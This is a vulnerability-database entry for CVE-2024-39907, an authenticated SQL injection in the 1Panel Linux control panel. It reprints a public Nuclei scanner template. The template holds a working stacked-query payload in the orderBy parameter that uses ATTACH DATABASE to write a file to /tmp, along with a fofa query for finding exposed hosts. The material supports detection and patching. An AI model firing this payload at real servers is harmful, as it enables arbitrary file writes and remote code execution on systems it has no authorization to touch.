CVE-2024-39907: 1Panel SQL Injection - Authenticated

日期: 2025-08-01 | 影响软件: 1Panel | POC: 已公开

漏洞描述

1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.

PoC代码[已公开]

id: CVE-2024-39907

info:
  name: 1Panel SQL Injection - Authenticated
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
  reference:
    - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39907
    cwe-id: CWE-89
    epss-score: 0.85243
    epss-percentile: 0.99316
    cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
    product: 1panel
    vendor: fit2cloud
  tags: cve,cve2024,sqli,1panel,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        EntranceCode: ZW50cmFuY2U=
        Content-Type: application/json

        {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}

      - |
        POST /api/v1/hosts/command/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2, "SQL logic error","table exp already exists")
          - contains(header_1, 'psession')
        condition: and
# digest: 4a0a004730450221008432761b0147336821aa5995d9e1c8a95d8fac4189b8860af2d12cfaee26c0f102201023c8b17a4e598149a0ea4365528053e597dc41a4acbb054286472133b1d423:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml

相关漏洞推荐